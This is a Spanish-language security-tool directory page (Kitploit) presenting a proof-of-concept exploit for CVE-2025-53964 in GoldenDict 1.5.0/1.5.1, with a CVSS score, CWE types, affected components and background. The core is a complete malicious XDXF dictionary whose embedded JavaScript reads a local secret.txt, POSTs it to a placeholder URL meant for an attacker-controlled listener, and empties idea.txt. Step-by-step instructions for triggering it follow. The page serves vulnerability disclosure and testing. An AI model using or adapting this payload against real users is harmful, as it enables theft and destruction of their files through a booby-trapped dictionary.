Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-53964 — Exploit de prueba de concepto para CVE-2025-53964: lectura/escritura remota de archivos a través de un diccionario XDXF malicioso en GoldenDict 1.5.0/1.5.1, aprovechando la ejecución de XML y JS sin sanitizar. | Kitploit
Herramientas/GitHubGitHub/tigr78/cve-2025-53964
Análisis EstáticoAnálisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubtigr78/cve-2025-53964

CVE-2025-53964

Exploit de prueba de concepto para CVE-2025-53964: lectura/escritura remota de archivos a través de un diccionario XDXF malicioso en GoldenDict 1.5.0/1.5.1, aprovechando la ejecución de XML y JS sin sanitizar.

Ver Repositorio
hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-53964

Evaluación de riesgo

CVSS v3: (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L) - 9.6/10

Descripción

GoldenDict 1.5.0 y 1.5.1 tiene un método peligroso expuesto que permite leer y modificar archivos cuando un usuario agrega un diccionario manipulado y luego busca cualquier término incluido en ese diccionario.

Información adicional

El producto proporciona una interfaz para la interacción con actores externos, que incluye un método peligroso en GoldenDict (ver. 1.5.0, 1.5.1) que no está restringido adecuadamente. Esto permite que un atacante remoto obtenga acceso para leer y modificar archivos en el sistema de archivos del usuario cuando se agrega y utiliza un diccionario malicioso preparado en el programa.

Tipo de vulnerabilidad

CWE-749: Método o Función Peligrosa Expuesta; CWE-79: Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('Cross-site Scripting')

Proveedor del producto

GoldenDict Project

Base de código del producto afectado

GoldenDict - 1.5.0, 1.5.1

Componente afectado

Ejecutable de GoldenDict, archivo de código fuente xdxf.cc, archivo de código fuente xdxf2html.cc, archivo de código fuente stardict.cc.

Tipo de ataque

Remoto

Impacto en la ejecución de código

true

Impacto en la divulgación de información

true

Otro impacto CVE

Acceso para leer y modificar archivos en el sistema de archivos del usuario

Vectores de ataque

Para explotar la vulnerabilidad, un usuario debe agregar un diccionario malicioso al programa y buscar cualquier término incluido en ese diccionario.

Descubridor

Grebennikov Timofey, especialista en el grupo de pruebas de penetración del departamento de control de seguridad del desarrollo del Grupo Astra.

Referencia

https://github.com/goldendict/goldendict/releases

Detalles

GoldenDict es un programa gráfico para buscar términos en Wikipedia y diccionarios instalados localmente. Se admiten varios formatos de diccionario, incluido el formato XDXF con marcado XML. Los diccionarios son distribuidos en Internet por otros usuarios.

El programa utiliza un motor de navegador, que está incluido en el paquete de componentes Qt Widgets, para renderizar y mostrar palabras de los diccionarios.

Varias violaciones de seguridad fueron descubiertas a la vez, que permiten la implementación de una vulnerabilidad crítica:

  1. Falta de sanitización del contenido XML;
  2. Falta de prohibición de ejecución de código JS;
  3. Política CSP deshabilitada o débil.

Juntas, estas violaciones llevan a la posibilidad de obtener acceso a los archivos del usuario mediante la incrustación de código JS malicioso en el marcado XML de un diccionario XDXF descargado de Internet.

Prueba de concepto

Para probar una vulnerabilidad en Windows, puede ejecutar un script que afecte a dos archivos preparados en el sistema de archivos.

  1. Cree dos archivos en el directorio C:\Users\Public\Documents y llénelos con cualquier contenido:
  • secret.txt – alguna información confidencial;
  • idea.txt – alguna información importante que no desea perder.
  1. Cree un diccionario XDXF malicious_dictionary.xdxf con el siguiente contenido:
root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<xdxf lang_from="ENG" lang_to="RUS" format="logical">
    <full_name>Malicious dictionary</full_name>
    <description>You have been pwned!</description>
    <meta_info>
        <copyright>Public Domain</copyright>
    </meta_info>
    <lexicon>
        <ar>
            <k>vuln_test</k>
            <def>
                Some description...
                <script>
                    var secretFile = 'file:///C:/Users/Public/Documents/secret.txt';
                    var ideaFile = 'file:///C:/Users/Public/Documents/idea.txt';
                    var xhr = new XMLHttpRequest();
                    xhr.open('GET', secretFile, true);
                    xhr.onload = function() {
                        var secretData = xhr.responseText;
                        if (secretData.length > 0) {
                            var xhr2 = new XMLHttpRequest();
                            xhr2.open('POST', '[Target-URL]', true);
                            xhr2.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
                            xhr2.send('data=' + encodeURIComponent(secretData));
                        }
                    };
                    xhr.onerror = function() {
                    };
                    xhr.send();
                    var xhr3 = new XMLHttpRequest();
                    xhr3.open('PUT', ideaFile, true);
                    xhr3.setRequestHeader('Content-Type', 'text/plain');
                    xhr3.send("");
                </script>
            </def>
        </ar>
    </lexicon>
</xdxf>

Al inicializarse, este diccionario enviará el contenido de secret.txt al servidor remoto y borrará idea.txt.

  1. Reemplace la plantilla [Target-URL] con la dirección de cualquier listener de solicitudes HTTP que controle.
  2. Agregue el diccionario generado a la lista de diccionarios locales de GoldenDict.
  3. Busque el término "vuln-test".

Verifique el éxito del ataque: el destinatario recibirá un mensaje que contiene el contenido del archivo secret.txt, y el archivo idea.txt estará vacío.

La vulnerabilidad afecta tanto a sistemas Windows como Linux. Para reproducir la vulnerabilidad en un sistema Linux, es necesario usar diferentes directorios para almacenar los archivos de prueba y especificarlos en el código malicioso.

Descargar herramienta